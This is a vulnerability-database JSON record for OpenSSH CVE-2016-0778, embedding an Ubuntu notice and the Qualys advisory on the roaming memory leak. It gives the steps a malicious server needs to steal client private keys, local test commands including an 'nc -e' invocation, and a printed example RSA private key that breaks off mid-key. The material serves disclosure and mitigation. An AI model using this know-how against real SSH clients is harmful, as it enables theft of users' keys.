"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10.9.5",
"versionStartIncluding": "10.9.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10.10.5",
"versionStartIncluding": "10.10.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "10.11.3",
"versionStartIncluding": "10.11.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "15.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Qualys Security Advisory team",
"sources": [
{
"db": "BID",
"id": "80698"
}
],
"trust": 0.3
},
"cve": "CVE-2016-0778",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-0778",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-88288",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-0778",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-0778",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-250",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-88288",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-0778",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-88288"
},
{
"db": "VULMON",
"id": "CVE-2016-0778"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================\nUbuntu Security Notice USN-2869-1\nJanuary 14, 2016\n\nopenssh vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSH could be made to expose sensitive information over the network. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n openssh-client 1:6.9p1-2ubuntu0.1\n\nUbuntu 15.04:\n openssh-client 1:6.7p1-5ubuntu1.4\n\nUbuntu 14.04 LTS:\n openssh-client 1:6.6p1-2ubuntu2.4\n\nUbuntu 12.04 LTS:\n openssh-client 1:5.9p1-5ubuntu1.8\n\nIn general, a standard system update will make all the necessary changes. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNr